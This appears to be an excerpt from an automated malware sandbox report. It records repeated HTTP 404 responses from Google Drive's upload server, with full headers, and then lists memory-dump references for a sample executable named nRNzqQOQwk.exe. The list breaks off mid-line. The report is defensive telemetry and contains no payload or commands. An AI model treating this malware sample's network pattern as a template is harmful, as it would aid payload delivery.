      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTxrKg_PRcbJuMiP9sWAXU45uDqcUXmDcebcjGHi5kR3BhScNA5rP936s04pD8kdGx7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-dsAg3u2m1n6G9y7LcDmY-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5fZLTZMvvAK6xJxCXVMWo0ALSuyc8p4cXLMX1B9WfDre_7bi_eVaENdNN0gvaULsE5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce--MbIMg8M0Mr0djtKj4o1Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5SHfOai1a0h7QW1V-BQfkOms-9u5QPqmXUzlupK8-GYJHLCAp0Fcaw8L5dmHc999FGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-tpo13ul6SnSk2J4xPFQsHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4rpgtBfhYJB1A2KOau2u4CO-QRuHFjT_6hYVOEdy7y6IWSG3VOcTAoCXXnwOQqIbjdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-bu_VVRdt6hU3qlDZVPM7fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Wtk9gHFrryruSlyIDc4g21IdKj_2V246s1RBlhnI9JYQz1PfjSiIMqY8kmnX-JhxEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-z0XLASyq9bl-uqtYbMOkmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT3RiN9ZxCtdSWdsf14TfbGiPZL38YNsLWgeMIBhPPTBA-DwoktkUs6bz4Xg-LUbdT8y5WTUBkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:15 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-drEtOWCVekWEL3C9TKVEBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5qtrPtrf2Pn6Vn6erPGfFCrkflvGsQd_kdKlUnUPCLe7jrcNdZIus4srMDKxPmQQYPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-jvvcYuxu1kv3cttYFuUR5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQG8UH1SaxGn2miBV8IRlCvItB0d_hZKuhnxm_mgyjbcBS_pGVYwi70r53PS1f8OKE9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:37 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SNSH-tzagvYScy3jlsUV8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4VlvnoEekSOfmMSxe5xbyRRgA3NbP9YSK1vrPVVLQnQJXVfTpZ7cs91oAyXGZeO9sDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-d59Pk4tclHO7Lv-r60pu_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59sotPYdc6k18dPqK7hPyfDpAs3BS1ns8BEg1Q4A2wuXhM8_BmqZhtek_Pz-QZuwQRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:38:00 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-cjjRN4_ZjqFy-a7rYTDLUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XJJtrVA6kNHjGAk7wjc16t8MWDfSPpR2BwqlHcwg9ctq4yD-dG1a02ZyxeP2DNeVaJDB1k9gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:38:11 GMTContent-Security-Policy: script-src 'nonce-JmpaSkKhCT82CkoBuI9M0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4USTthsUGV3EuylFkh-2vBtRRMRvC6AOV7JyO0IW9kDGcc7Nz3811iyd4SSUlZyezBeVPBSoEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:38:22 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-f1wcMSF50eix_uAYV4hNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6VT7SqsEAXFXI3gxlBVIYxVvkTmYV-99KGo9FoVCTCN1ocLk0vaLGYUmzOLOMuNqhgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:38:33 GMTContent-Security-Policy: script-src 'nonce-ewITGIgRhDbS9Uenfm61xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6u792ajz53euqYAGQY-ZaelbL6ApheVv0IPHtrssMzWXFV8CBBAp_2QCgdUTo85lJ4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:38:44 GMTContent-Security-Policy: script-src 'nonce--iuWKS7bn5xuXfLW05SApA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845952675.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845828650.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 